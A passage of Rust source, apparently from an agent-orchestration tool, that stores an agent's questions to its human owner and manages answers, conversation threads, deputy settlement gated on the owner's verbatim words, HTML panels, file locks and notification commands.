1use std::path::{Path, PathBuf};
33use std::time::Duration;
34
35use anyhow::{Context, Result, bail};
36use jiff::Timestamp;
37use serde::{Deserialize, Serialize};
38
39use crate::config;
40use crate::proc::Quiet as _;
41use crate::run::RunStatus;
42
43pub const SCHEMA: u32 = 5;
60
61const POLL: Duration = Duration::from_secs(3);
70
71const REPLY_QUIET_WINDOW: Duration = Duration::from_secs(5 * 60);
82
83const NOTIFY_TIMEOUT: Duration = Duration::from_secs(20);
89
90const WAIT_SLICE: Duration = Duration::from_secs(240);
114
115pub const LEASE_TTL: Duration = Duration::from_secs(90);
125
126const LOCK_STALE: Duration = Duration::from_secs(10);
129
130pub const WEB_URL_ENV: &str = "MAGI_WEB_URL";
141
142pub const PANEL_MAX_BYTES: u64 = 8 * 1024 * 1024;
151
152const PANEL_DIR: &str = ".panel";
158
159const PANEL_HTML: &str = "index.html";
161
162const PANEL_TMP: &str = ".panel.tmp";
164
165pub fn valid_asset_name(name: &str) -> bool {
182 if name.is_empty() || name.len() > 64 || name.contains("..") {
183 return false;
184 }
185 let mut chars = name.chars();
186 chars.next().is_some_and(|c| c.is_ascii_alphanumeric())
187 && chars.all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
188}
189
190#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
192#[serde(rename_all = "lowercase")]
193pub enum QuestionStatus {
194 Open,
196 Answered,
198 Abandoned,
202}
203
204impl QuestionStatus {
205 pub fn open(self) -> bool {
207 matches!(self, Self::Open)
208 }
209
210 pub fn as_str(self) -> &'static str {
212 match self {
213 Self::Open => "open",
214 Self::Answered => "answered",
215 Self::Abandoned => "abandoned",
216 }
217 }
218}
219
220#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
227#[serde(rename_all = "lowercase")]
228pub enum Answer {
229 Choice(String),
231 Text(String),
233}
234
235#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
243#[serde(tag = "do", rename_all = "lowercase")]
244pub enum ChoiceAction {
245 Resume {
247 run: String,
249 },
250 Requeue,
252 Done,
254}
255
256impl ChoiceAction {
257 pub fn parse(spec: &str, default_run: &str) -> Result<(String, Self)> {
262 let Some((label, verb)) = spec.rsplit_once('=') else {
263 bail!("`--action {spec}` must look like `<choice>=<resume[:run]|requeue|done>`");
264 };
265 let label = label.trim();
266 if label.is_empty() {
267 bail!("`--action {spec}` names no choice before `=`");
268 }
269 let verb = verb.trim();
270 let action = match verb.split_once(':') {
271 Some(("resume", run)) if !run.trim().is_empty() => Self::Resume {
272 run: run.trim().to_owned(),
273 },
274 None if verb == "resume" => {
275 if default_run.is_empty() {
276 bail!("`--action {spec}` names no run and MAGI_RUN is not set");
277 }
278 Self::Resume {
279 run: default_run.to_owned(),
280 }
281 }
282 None if verb == "requeue" => Self::Requeue,
283 None if verb == "done" => Self::Done,
284 _ => bail!(
285 "unknown action `{verb}` in `--action {spec}`; \
286 use resume[:<run>], requeue or done"
287 ),
288 };
289 Ok((label.to_owned(), action))
290 }
291
292 pub fn describe(&self) -> String {
294 match self {
295 Self::Resume { run } => format!("resume run {}", short(run)),
296 Self::Requeue => "requeue the task".to_owned(),
297 Self::Done => "mark the task done".to_owned(),
298 }
299 }
300}
301
302pub fn parse_actions(
305 specs: &[String],
306 choices: &[String],
307 default_run: &str,
308) -> Result<std::collections::BTreeMap<String, ChoiceAction>> {
309 let mut out = std::collections::BTreeMap::new();
310 for spec in specs {
311 let (label, action) = ChoiceAction::parse(spec, default_run)?;
312 if !choices.contains(&label) {
313 bail!(
314 "`--action {spec}`: `{label}` is not one of the --choice values ({})",
315 choices.join(", ")
316 );
317 }
318 if out.insert(label.clone(), action).is_some() {
319 bail!("more than one --action for `{label}`");
320 }
321 }
322 Ok(out)
323}
324
325#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
336#[serde(rename_all = "lowercase")]
337pub enum Who {
338 Operator,
340 Agent,
343}
344
345#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
353#[serde(deny_unknown_fields)]
354pub struct Turn {
355 pub who: Who,
357 pub body: String,
359 pub at: Timestamp,
361}
362
363#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
365#[serde(rename_all = "lowercase")]
366pub enum WaiterKind {
367 Asker,
369 Daemon,
372 Deputy,
376}
377
378#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
390pub struct Deputy {
391 pub brief: String,
394 #[serde(default)]
396 pub agent: String,
397 #[serde(default)]
399 pub seat: Option<crate::agent::SeatState>,
400 #[serde(default)]
403 pub starts: u32,
404}
405
406impl Deputy {
407 pub fn new(brief: String) -> Self {
409 Self {
410 brief,
411 agent: String::new(),
412 seat: None,
413 starts: 0,
414 }
415 }
416}
417
418pub fn deputy_seat_key(id: &str) -> String {
420 format!("deputy-{}", short(id))
421}
422
423#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
428pub struct Waiter {
429 pub kind: WaiterKind,
431 pub since: Timestamp,
433}
434
435#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
444pub struct Lease {
445 pub kind: WaiterKind,
447 pub pid: u32,
449 pub beat_at: Timestamp,
451}
452
453impl Lease {
454 pub fn fresh(&self, now: Timestamp) -> bool {
456 now.as_second() - self.beat_at.as_second() <= LEASE_TTL.as_secs() as i64
457 }
458}
459
460#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
462#[serde(deny_unknown_fields)]
463pub struct Question {
464 pub schema: u32,
466 pub id: String,
469 pub run: String,
471 pub node: String,
473 pub seat: String,
476 pub summary: String,
479 pub detail: String,
482 pub choices: Vec<String>,
486 #[serde(default)]
490 pub actions: std::collections::BTreeMap<String, ChoiceAction>,
491 #[serde(default)]
498 pub panel: bool,
499 #[serde(default)]
506 pub assets: Vec<String>,
507 pub status: QuestionStatus,
509 pub asked_at: Timestamp,
511 pub answered_at: Option<Timestamp>,
513 pub answer: Option<Answer>,
515 #[serde(default)]
524 pub thread: Vec<Turn>,
525 #[serde(default)]
540 pub answer_timeout: u64,
541 #[serde(default)]
547 pub cwd: Option<String>,
548 #[serde(default)]
550 pub waiter: Option<Waiter>,
551 #[serde(default)]
555 pub delivered_turns: usize,
556 #[serde(default)]
559 pub answer_delivered: bool,
560 #[serde(default)]
563 pub deputy: Option<Deputy>,
564}
565
566impl Question {
567 pub fn run_names_task(&self) -> bool {
570 matches!(
571 self.node.as_str(),
572 crate::conduct::NODE | crate::triage::NODE | crate::triage::DEPS_NODE
573 )
574 }
575
576 pub fn new(
579 run: String,
580 node: String,
581 seat: String,
582 summary: String,
583 detail: String,
584 choices: Vec<String>,
585 ) -> Self {
586 Self {
587 schema: SCHEMA,
588 id: new_id(),
589 run,
590 node,
591 seat,
592 summary,
593 detail,
594 choices,
595 actions: std::collections::BTreeMap::new(),
596 panel: false,
597 assets: Vec::new(),
598 status: QuestionStatus::Open,
599 asked_at: Timestamp::now(),
600 answered_at: None,
601 answer: None,
602 thread: Vec::new(),
603 answer_timeout: 0,
604 cwd: None,
605 waiter: None,
606 delivered_turns: 0,
607 answer_delivered: false,
608 deputy: None,
609 }
610 }
611
612 pub fn short(&self) -> &str {
614 short(&self.id)
615 }
616
617 pub fn chosen_action(&self) -> Option<&ChoiceAction> {
620 match (&self.status, &self.answer) {
621 (QuestionStatus::Answered, Some(Answer::Choice(c))) => self.actions.get(c),
622 _ => None,
623 }
624 }
625
626 pub fn free_text(&self) -> bool {
628 self.choices.is_empty()
629 }
630
631 pub fn answer(&mut self, answer: Answer) -> Result<()> {
641 match self.status {
642 QuestionStatus::Answered => bail!(
643 "question {} was already answered; the run has moved on and a \
644 second answer would be a decision nobody acted on",
645 self.short()
646 ),
647 QuestionStatus::Abandoned => bail!(
648 "question {} was abandoned and the run behind it is gone",
649 self.short()
650 ),
651 QuestionStatus::Open => {}
652 }
653 let body = match &answer {
654 Answer::Choice(c) | Answer::Text(c) => c.as_str(),
655 };
656 if body.trim().is_empty() {
657 bail!(
658 "question {} needs an answer; an empty one tells the agent \
659 nothing and it would guess anyway",
660 self.short()
661 );
662 }
663 match &answer {
664 Answer::Choice(c) if self.free_text() => bail!(
665 "question {} asks for free text, so `{c}` cannot be a choice \
666 it offered",
667 self.short()
668 ),
669 Answer::Choice(c) if !self.choices.iter().any(|o| o == c) => bail!(
670 "`{c}` is not one of the choices question {} offers: {}",
671 self.short(),
672 self.choices.join(", ")
673 ),
674 Answer::Text(_) if !self.free_text() => bail!(
675 "question {} is multiple choice; answer with one of: {}",
676 self.short(),
677 self.choices.join(", ")
678 ),
679 _ => {}
680 }
681 self.answered_at = Some(Timestamp::now());
682 self.answer = Some(answer);
683 self.status = QuestionStatus::Answered;
684 Ok(())
685 }
686
687 pub fn abandon(&mut self, why: impl Into<String>) {
699 if !self.status.open() {
700 return;
701 }
702 self.status = QuestionStatus::Abandoned;
703 let why = why.into();
704 let why = why.trim();
705 if why.is_empty() {
706 return;
707 }
708 if !self.detail.is_empty() {
709 self.detail.push('\n');
710 }
711 self.detail.push_str("\n_Abandoned: ");
712 self.detail.push_str(why);
713 self.detail.push_str("._\n");
714 }
715
716 pub fn resolution(&self) -> Option<String> {
723 match (self.status, &self.answer) {
724 (QuestionStatus::Answered, Some(Answer::Choice(a) | Answer::Text(a))) => {
725 Some(a.clone())
726 }
727 _ => None,
728 }
729 }
730
731 pub fn settle_by_deputy(&mut self, seat: &str, label: &str, quote: &str) -> Result<()> {
742 let Some(deputy) = &self.deputy else {
743 bail!("question {} has no deputy", self.short());
744 };
745 let own = deputy.seat.as_ref().map(|s| s.key.as_str());
746 if own != Some(seat) {
747 bail!("only the deputy of question {} may settle it", self.short());
748 }
749 if !self.choices.iter().any(|c| c == label) {
750 bail!(
751 "`{label}` is not one of the choices offered on question {}",
752 self.short()
753 );
754 }
755 let quote = quote.trim();
756 if quote.is_empty()
757 || !self
758 .thread
759 .iter()
760 .any(|t| t.who == Who::Operator && t.body.contains(quote))
761 {
762 bail!(
763 "the quote is not something the owner said on question {}",
764 self.short()
765 );
766 }
767 let latest = self
770 .thread
771 .iter()
772 .rev()
773 .find(|t| t.who == Who::Operator)
774 .map(|t| t.body.trim());
775 if crate::deputy::merge_gated(self) {
776 let ok = if label == crate::land::APPROVE {
782 latest.is_some_and(|m| m.contains(quote))
783 } else if label == crate::land::HOLD {
784 latest.is_some_and(|m| {
785 quote.eq_ignore_ascii_case(label) && m.eq_ignore_ascii_case(label)
786 })
787 } else {
788 false
789 };
790 if !ok {
791 bail!(
792 "on a merge approval `{label}` settles it only when the quote is a \
793 verbatim part of the owner's latest message ({}); if the wording is \
794 doubtful, ask what they mean with `--thread` instead",
795 if label == crate::land::HOLD {
796 "for `hold`, the whole message"
797 } else {
798 "the quote must be the instruction itself"
799 }
800 );
801 }
802 } else if crate::deputy::destructive(self, label)
803 && !latest.is_some_and(|m| crate::land::unhedged(m, quote))
804 {
805 bail!(
806 "`{label}` cannot be undone; it settles question {} only when the owner's \
807 latest message clearly says so, unhedged and quoted verbatim (no maybe / if \
808 / not / question); ask what they mean with `--thread` instead",
809 self.short()
810 );
811 }
812 self.thread.push(Turn {
813 who: Who::Agent,
814 body: format!("Settled as `{label}` on the owner's words: \"{quote}\""),
815 at: Timestamp::now(),
816 });
817 self.delivered_turns = self.thread.len();
818 self.answer(Answer::Choice(label.to_owned()))
819 }
820
821 pub fn say(&mut self, body: impl Into<String>) -> Result<()> {
832 match self.status {
833 QuestionStatus::Answered => bail!(
834 "question {} was already answered; there is nothing left to \
835 discuss",
836 self.short()
837 ),
838 QuestionStatus::Abandoned => bail!(
839 "question {} was abandoned and the run behind it is gone",
840 self.short()
841 ),
842 QuestionStatus::Open => {}
843 }
844 let body = body.into();
845 if body.trim().is_empty() {
846 bail!("a message to question {} cannot be empty", self.short());
847 }
848 self.thread.push(Turn {
849 who: Who::Operator,
850 body,
851 at: Timestamp::now(),
852 });
853 Ok(())
854 }
855
856 pub fn reply(&mut self, body: impl Into<String>, choices: Vec<String>) -> Result<()> {
866 match self.status {
867 QuestionStatus::Answered => bail!(
868 "question {} was already answered; replying now would not \
869 reach anyone",
870 self.short()
871 ),
872 QuestionStatus::Abandoned => bail!(
873 "question {} was abandoned and the run behind it is gone",
874 self.short()
875 ),
876 QuestionStatus::Open => {}
877 }
878 let body = body.into();
879 if body.trim().is_empty() {
880 bail!("a reply to question {} cannot be empty", self.short());
881 }
882 self.actions.retain(|label, _| choices.contains(label));
884 self.choices = choices;
885 let unread = self.unread_from_owner().is_some();
886 self.thread.push(Turn {
887 who: Who::Agent,
888 body,
889 at: Timestamp::now(),
890 });
891 if !unread {
895 self.delivered_turns = self.thread.len();
896 }
897 Ok(())
898 }
899
900 pub fn unread_from_owner(&self) -> Option<String> {
907 if !self.status.open() {
908 return None;
909 }
910 let said = self.undelivered_owner_turns();
911 (!said.is_empty()).then(|| said.join("\n\n"))
912 }
913
914 pub fn undelivered_owner_turns(&self) -> Vec<&str> {
920 let from = self.delivered_turns.min(self.thread.len());
921 self.thread[from..]
922 .iter()
923 .filter(|t| t.who == Who::Operator)
924 .map(|t| t.body.as_str())
925 .collect()
926 }
927
928 pub fn last_activity(&self) -> i64 {
932 self.thread
933 .iter()
934 .map(|t| t.at.as_second())
935 .max()
936 .unwrap_or(0)
937 .max(self.asked_at.as_second())
938 }
939
940 pub fn waiting_on_agent(&self) -> bool {
949 self.status.open() && matches!(self.thread.last(), Some(t) if t.who == Who::Operator)
950 }
951
952 fn should_notify(&self, now: Timestamp) -> bool {
960 let Some(last) = self
961 .thread
962 .iter()
963 .rev()
964 .find(|t| t.who == Who::Operator)
965 .map(|t| t.at)
966 else {
967 return true;
968 };
969 now.as_second() - last.as_second() > REPLY_QUIET_WINDOW.as_secs() as i64
970 }
971}
972
973#[derive(Debug, Clone)]
975pub struct Questions {
976 root: PathBuf,
977}
978
979impl Questions {
980 pub fn open() -> Self {
982 Self::at(crate::run::home().join("questions"))
983 }
984
985 pub fn at(root: PathBuf) -> Self {
988 Self { root }
989 }
990
991 pub fn root(&self) -> &Path {
993 &self.root
994 }
995
996 pub fn path_of(&self, id: &str) -> PathBuf {
998 self.root.join(format!("{id}.json"))
999 }
1000
1001 pub fn panel_dir(&self, id: &str) -> PathBuf {
1003 self.root.join(format!("{id}{PANEL_DIR}"))
1004 }
1005
1006 pub fn put_panel(&self, q: &mut Question, html: &str, assets: &[PathBuf]) -> Result<()> {
1030 if !valid_asset_name(&q.id) {
1031 bail!(
1032 "question id `{}` is not a name magi will build a panel path from",
1033 q.id
1034 );
1035 }
1036 if html.trim().is_empty() {
1037 bail!(
1038 "question {} was handed an empty panel; an empty frame reads to \
1039 the owner as \"the agent had nothing to say\", which is a lie",
1040 q.short()
1041 );
1042 }
1043
1044 let mut named: Vec<(String, &Path)> = Vec::with_capacity(assets.len());
1047 for src in assets {
1048 let name = src.file_name().and_then(|n| n.to_str()).unwrap_or_default();
1049 if !valid_asset_name(name) {
1050 bail!(
1051 "panel asset `{}` cannot be stored: a panel file name must \
1052 match ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`",
1053 src.display()
1054 );
1055 }
1056 if let Some((_, first)) = named.iter().find(|(n, _)| n == name) {
1057 bail!(
1058 "two panel assets are both named `{name}` - {} and {} - and \
1059 the panel can only show one of them; rename one at the source",
1060 first.display(),
1061 src.display()
1062 );
1063 }
1064 named.push((name.to_owned(), src.as_path()));
1065 }
1066
1067 let mut total = html.len() as u64;
1068 for (_, src) in &named {
1069 let meta = std::fs::metadata(src)
1070 .with_context(|| format!("stat panel asset {}", src.display()))?;
1071 if !meta.is_file() {
1072 bail!(
1073 "panel asset `{}` is not a file; a panel is html plus files \
1074 copied beside it",
1075 src.display()
1076 );
1077 }
1078 total = total.saturating_add(meta.len());
1079 }
1080 if total > PANEL_MAX_BYTES {
1081 bail!(
1082 "panel for question {} is {total} bytes, over magi's cap of \
1083 {PANEL_MAX_BYTES} bytes; nothing was written",
1084 q.short()
1085 );
1086 }
1087
1088 let tmp = self.root.join(format!("{}{PANEL_TMP}", q.id));
1089 let dir = self.panel_dir(&q.id);
1090 std::fs::create_dir_all(&self.root)
1091 .with_context(|| format!("create {}", self.root.display()))?;
1092 clear_dir(&tmp)?;
1093 std::fs::create_dir(&tmp).with_context(|| format!("create {}", tmp.display()))?;
1094 if let Err(e) = fill_panel(&tmp, html, &named) {
1095 let _ = std::fs::remove_dir_all(&tmp);
1098 return Err(e);
1099 }
1100 clear_dir(&dir)?;
1101 std::fs::rename(&tmp, &dir)
1102 .with_context(|| format!("move panel into {}", dir.display()))?;
1103
1104 q.panel = true;
1105 q.assets = named.into_iter().map(|(n, _)| n).collect();
1106 q.assets.sort_unstable();
1107 Ok(())
1108 }
1109
1110 pub fn panel_html(&self, id: &str) -> Option<String> {
1116 if !valid_asset_name(id) {
1117 return None;
1118 }
1119 std::fs::read_to_string(self.panel_dir(id).join(PANEL_HTML)).ok()
1120 }
1121
1122 pub fn panel_asset(&self, id: &str, name: &str) -> Result<Option<Vec<u8>>> {
1133 if !valid_asset_name(name) {
1134 bail!(
1135 "`{name}` is not a panel file name; it must match \
1136 ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`"
1137 );
1138 }
1139 if !valid_asset_name(id) {
1140 return Ok(None);
1141 }
1142 let dir = self.panel_dir(id);
1143 if !dir.is_dir() {
1144 return Ok(None);
1145 }
1146 let path = dir.join(name);
1147 match std::fs::read(&path) {
1148 Ok(bytes) => Ok(Some(bytes)),
1149 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(None),
1150 Err(e) => Err(e).with_context(|| format!("read {}", path.display())),
1151 }
1152 }
1153
1154 pub fn drop_panel(&self, id: &str) -> Result<()> {
1163 if !valid_asset_name(id) {
1164 bail!("question id `{id}` is not a name magi will build a panel path from");
1165 }
1166 clear_dir(&self.panel_dir(id))?;
1167 clear_dir(&self.root.join(format!("{id}{PANEL_TMP}")))
1168 }
1169
1170 pub fn lease_path(&self, id: &str) -> PathBuf {
1172 self.root.join(format!("{id}.lease"))
1173 }
1174
1175 pub fn read_lease(&self, id: &str) -> Option<Lease> {
1177 let body = std::fs::read_to_string(self.lease_path(id)).ok()?;
1178 serde_json::from_str(&body).ok()
1179 }
1180
1181 pub fn beat(&self, id: &str, kind: WaiterKind) {
1188 let lease = Lease {
1189 kind,
1190 pid: std::process::id(),
1191 beat_at: Timestamp::now(),
1192 };
1193 let path = self.lease_path(id);
1194 let tmp = path.with_extension("lease.tmp");
1195 let written = std::fs::create_dir_all(&self.root)
1196 .and_then(|()| std::fs::write(&tmp, serde_json::to_string(&lease).unwrap_or_default()))
1197 .and_then(|()| std::fs::rename(&tmp, &path));
1198 if let Err(e) = written {
1199 tracing::debug!("could not beat the lease on question {id}: {e}");
1200 }
1201 }
1202
1203 pub fn drop_lease(&self, id: &str) {
1205 let _ = std::fs::remove_file(self.lease_path(id));
1206 }
1207
1208 pub fn update<T>(
1219 &self,
1220 id: &str,
1221 f: impl FnOnce(&mut Question) -> Result<T>,
1222 ) -> Result<(Question, T)> {
1223 std::fs::create_dir_all(&self.root)
1224 .with_context(|| format!("create {}", self.root.display()))?;
1225 let lock = self.root.join(format!("{id}.lock"));
1226 let started = std::time::Instant::now();
1227 loop {
1228 match std::fs::OpenOptions::new()
1229 .write(true)
1230 .create_new(true)
1231 .open(&lock)
1232 {
1233 Ok(_) => break,
1234 Err(e) if e.kind() == std::io::ErrorKind::AlreadyExists => {
1235 let stale = std::fs::metadata(&lock)
1236 .and_then(|m| m.modified())
1237 .ok()
1238 .and_then(|t| t.elapsed().ok())
1239 .is_some_and(|age| age > LOCK_STALE);
1240 if stale {
1241 let _ = std::fs::remove_file(&lock);
1242 } else if started.elapsed() > LOCK_STALE {
1243 bail!("could not lock question {id}");
1244 } else {
1245 std::thread::sleep(Duration::from_millis(15));
1246 }
1247 }
1248 Err(e) => return Err(e).with_context(|| format!("lock {}", lock.display())),
1249 }
1250 }
1251 struct Unlock(PathBuf);
1252 impl Drop for Unlock {
1253 fn drop(&mut self) {
1254 let _ = std::fs::remove_file(&self.0);
1255 }
1256 }
1257 let _guard = Unlock(lock);
1258 let mut q = read_path(&self.path_of(id))?;
1259 let out = f(&mut q)?;
1260 self.put(&mut q)?;
1261 Ok((q, out))
1262 }
1263
1264 pub fn put(&self, q: &mut Question) -> Result<()> {
1268 std::fs::create_dir_all(&self.root)
1269 .with_context(|| format!("create {}", self.root.display()))?;
1270 let body = serde_json::to_string_pretty(q).context("serialize question")?;
1271 let path = self.path_of(&q.id);
1272 let tmp = path.with_extension("json.tmp");
1273 let is_new = !path.exists();
1274 std::fs::write(&tmp, &body).with_context(|| format!("write {}", tmp.display()))?;
1275 std::fs::rename(&tmp, &path).with_context(|| format!("replace {}", path.display()))?;
1276 if is_new
1279 && q.status.open()
1280 && q.node != crate::bump::NOTICE_NODE
1281 && let Some(home) = self.root.parent().filter(|p| !p.as_os_str().is_empty())
1282 {
1283 crate::notices::quiet_for(home, q);
1284 }
1285 Ok(())
1286 }
1287
1288 pub fn get(&self, id: &str) -> Result<Question> {
1290 let resolved = self.resolve_id(id)?;
1291 read_path(&self.path_of(&resolved))
1292 }
1293
1294 pub fn list(&self) -> Vec<Question> {
1302 let mut all: Vec<Question> = std::fs::read_dir(&self.root)
1303 .into_iter()
1304 .flatten()
1305 .flatten()
1306 .map(|e| e.path())
1307 .filter(|p| p.extension().is_some_and(|x| x == "json"))
1308 .filter_map(|p| read_path(&p).ok())
1309 .collect();
1310 all.sort_unstable_by(|a, b| {
1311 let rank = |q: &Question| u8::from(!q.status.open());
1312 rank(a).cmp(&rank(b)).then_with(|| b.id.cmp(&a.id))
1313 });
1314 all
1315 }
1316
1317 pub fn open_for(&self, run: &str) -> Vec<Question> {
1323 self.list()
1324 .into_iter()
1325 .filter(|q| q.status.open() && q.run == run)
1326 .collect()
1327 }
1328
1329 pub fn abandon_for_run(&self, run: &str, why: &str) -> Result<usize> {
1342 let mut abandoned = 0;
1343 for mut q in self.open_for(run) {
1344 q.abandon(why);
1345 self.put(&mut q)?;
1346 abandoned += 1;
1347 }
1348 Ok(abandoned)
1349 }
1350
1351 pub fn settle_run(&self, run: &str, status: RunStatus) -> Result<usize> {
1375 if status.resumable() {
1376 return Ok(0);
1377 }
1378 let why = format!(
1379 "run {run} {}, so nothing is waiting for this answer",
1380 status.as_str()
1381 );
1382 let mut abandoned = 0;
1387 for mut q in self.open_for(run) {
1388 if q.node == crate::bump::NOTICE_NODE {
1389 continue;
1390 }
1391 q.abandon(&why);
1392 self.put(&mut q)?;
1393 abandoned += 1;
1394 }
1395 Ok(abandoned)
1396 }
1397
1398 pub fn resolve_id(&self, prefix: &str) -> Result<String> {
1401 if self.path_of(prefix).is_file() {
1402 return Ok(prefix.to_owned());
1403 }
1404 let hits: Vec<String> = self
1405 .list()
1406 .into_iter()
1407 .map(|q| q.id)
1408 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix))
1409 .collect();
1410 match hits.len() {
1411 1 => Ok(hits.into_iter().next().expect("exactly one hit")),
1412 0 => bail!("no question matches `{prefix}`"),
1413 _ => bail!(
1414 "`{prefix}` matches {} questions: {}",
1415 hits.len(),
1416 hits.join(", ")
1417 ),
1418 }
1419 }
1420
1421 pub fn revision(&self) -> u64 {
1425 std::fs::read_dir(&self.root)
1426 .into_iter()
1427 .flatten()
1428 .flatten()
1429 .filter_map(|e| e.metadata().ok())
1430 .filter_map(|m| m.modified().ok())
1431 .filter_map(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
1432 .map(|d| d.as_millis() as u64)
1433 .max()
1434 .unwrap_or(0)
1435 }
1436
1437 pub fn count_open(&self) -> usize {
1443 self.list().iter().filter(|q| q.status.open()).count()
1444 }
1445
1446 pub fn count_needs_owner(&self) -> usize {
1455 self.list()
1456 .iter()
1457 .filter(|q| q.status.open() && !q.waiting_on_agent())
1458 .count()
1459 }
1460}
1461
1462#[derive(Debug, Clone, PartialEq, Eq)]
1464pub enum Wait {
1465 Answered(String),
1467 Replied(String),
1472 Pending,
1479 Abandoned,
1484}
1485
1486pub async fn ask_and_wait(
1493 q: &mut Question,
1494 store: &Questions,
1495 notify: &config::Notify,
1496 timeout: Duration,
1497) -> Result<Wait> {
1498 wait_for_owner(q, store, notify, timeout, POLL).await
1499}
1500
1501pub async fn resume_wait(q: &mut Question, store: &Questions, timeout: Duration) -> Result<Wait> {
1516 wait_loop(q, store, timeout, WAIT_SLICE, POLL).await
1517}
1518
1519async fn wait_for_owner(
1525 q: &mut Question,
1526 store: &Questions,
1527 cfg: &config::Notify,
1528 timeout: Duration,
1529 poll: Duration,
1530) -> Result<Wait> {
1531 if !store.path_of(&q.id).is_file() {
1535 store.put(q).context("file the question")?;
1536 }
1537 if q.should_notify(Timestamp::now()) {
1538 if let Err(e) = notify(cfg, q).await {
1539 tracing::warn!(
1544 "could not notify about question {}: {e:#} - the web UI is the \
1545 only surface for it now",
1546 q.short()
1547 );
1548 }
1549 }
1550 tracing::info!(
1551 "question {} from {} is waiting for you: {}",
1552 q.short(),
1553 q.seat,
1554 q.summary
1555 );
1556 wait_loop(q, store, timeout, WAIT_SLICE, poll).await
1557}
1558
1559fn hold(store: &Questions, id: &str) {
1561 store.beat(id, WaiterKind::Asker);
1562 let took = store.update(id, |q| {
1563 if q.status.open() {
1564 q.waiter = Some(Waiter {
1565 kind: WaiterKind::Asker,
1566 since: Timestamp::now(),
1567 });
1568 }
1569 Ok(())
1570 });
1571 if let Err(e) = took {
1572 tracing::debug!("could not note the wait on question {id}: {e:#}");
1573 }
1574}
1575
1576pub fn hand_over(store: &Questions, q: &mut Question) {
1584 let done = store.update(&q.id, |r| {
1585 r.delivered_turns = r.delivered_turns.max(q.thread.len());
1586 if r.status == QuestionStatus::Answered {
1587 r.answer_delivered = true;
1588 }
1589 r.waiter = None;
1590 Ok(())
1591 });
1592 match done {
1593 Ok((fresh, ())) => *q = fresh,
1594 Err(e) => tracing::debug!("could not record the hand-over of {}: {e:#}", q.short()),
1595 }
1596}
1597
1598pub fn answer_for_agent(q: &Question, answer: &str) -> String {
1602 let says = q.undelivered_owner_turns();
1603 if says.is_empty() {
1604 return answer.to_owned();
1605 }
1606 format!(
1607 "the owner also said, before answering:\n\n{}\n\nthe owner answered:\n\n{answer}",
1608 says.join("\n\n")
1609 )
1610}
1611
1612pub fn deliver_answer(
1615 store: &Questions,
1616 q: &mut Question,
1617 answer: &str,
1618 out: &mut impl std::io::Write,
1619) -> std::io::Result<()> {
1620 writeln!(out, "{}", answer_for_agent(q, answer))?;
1621 out.flush()?;
1622 hand_over(store, q);
1623 Ok(())
1624}
1625
1626async fn wait_loop(
1636 q: &mut Question,
1637 store: &Questions,
1638 timeout: Duration,
1639 slice: Duration,
1640 poll: Duration,
1641) -> Result<Wait> {
1642 if let Some(said) = q.unread_from_owner() {
1652 return Ok(Wait::Replied(said));
1653 }
1654 hold(store, &q.id);
1655
1656 let bounded = timeout.min(slice);
1657 let is_the_real_deadline = bounded >= timeout;
1658 let deadline = tokio::time::Instant::now() + bounded;
1659 loop {
1660 let now = tokio::time::Instant::now();
1661 if now >= deadline {
1662 if !is_the_real_deadline {
1663 return Ok(Wait::Pending);
1667 }
1668 let why = format!("no answer within {}s of asking", timeout.as_secs().max(1));
1669 let (fresh, unread) = store
1673 .update(&q.id, |r| {
1674 let unread = r.unread_from_owner();
1675 if unread.is_none() {
1676 r.abandon(&why);
1677 r.waiter = None;
1678 }
1679 Ok(unread)
1680 })
1681 .context("record the abandoned question")?;
1682 *q = fresh;
1683 if let Some(said) = unread {
1684 return Ok(Wait::Replied(said));
1685 }
1686 tracing::warn!(
1687 "question {} went unanswered for {}s; the run parks and the \
1688 question stays as the record of it",
1689 q.short(),
1690 timeout.as_secs()
1691 );
1692 return Ok(Wait::Abandoned);
1693 }
1694 tokio::time::sleep(poll.min(deadline - now)).await;
1695 store.beat(&q.id, WaiterKind::Asker);
1696 match store.get(&q.id) {
1697 Ok(fresh) if !fresh.status.open() => {
1698 *q = fresh;
1702 return Ok(match q.resolution() {
1703 Some(a) => Wait::Answered(a),
1704 None => Wait::Abandoned,
1707 });
1708 }
1709 Ok(fresh) => {
1710 if let Some(said) = fresh.unread_from_owner() {
1711 *q = fresh;
1712 return Ok(Wait::Replied(said));
1713 }
1714 }
1717 Err(e) => {
1718 tracing::debug!("could not re-read question {}: {e:#}", q.short());
1722 }
1723 }
1724 }
1725}
1726
1727pub async fn notify(cmd: &config::Notify, q: &Question) -> Result<()> {
1738 notify_text(cmd, &q.run, &q.summary).await
1739}
1740
1741pub async fn notify_text(cmd: &config::Notify, run: &str, summary: &str) -> Result<()> {
1744 let Some((program, args)) = cmd.command.split_first() else {
1745 return Ok(());
1747 };
1748 let url = web_url();
1749 if url.is_empty() && cmd.command.iter().any(|a| a.contains("{url}")) {
1750 tracing::warn!(
1751 "the notification command uses {{url}} but {WEB_URL_ENV} is unset, \
1752 so the link will be empty - export it next to `magi serve` with \
1753 the address `magi web --open` printed"
1754 );
1755 }
1756 let argv: Vec<String> = args.iter().map(|a| expand(a, run, summary, &url)).collect();
1757 tracing::debug!(program = %program, args = ?argv, "notifying");
1758
1759 let mut child = tokio::process::Command::new(program);
1760 child.quiet();
1761 child
1762 .args(&argv)
1763 .stdin(std::process::Stdio::null())
1764 .kill_on_drop(true);
1767 let out = match tokio::time::timeout(NOTIFY_TIMEOUT, child.output()).await {
1768 Ok(r) => r.with_context(|| format!("run notification command `{program}`"))?,
1769 Err(_) => bail!(
1770 "notification command `{program}` did not finish within {}s",
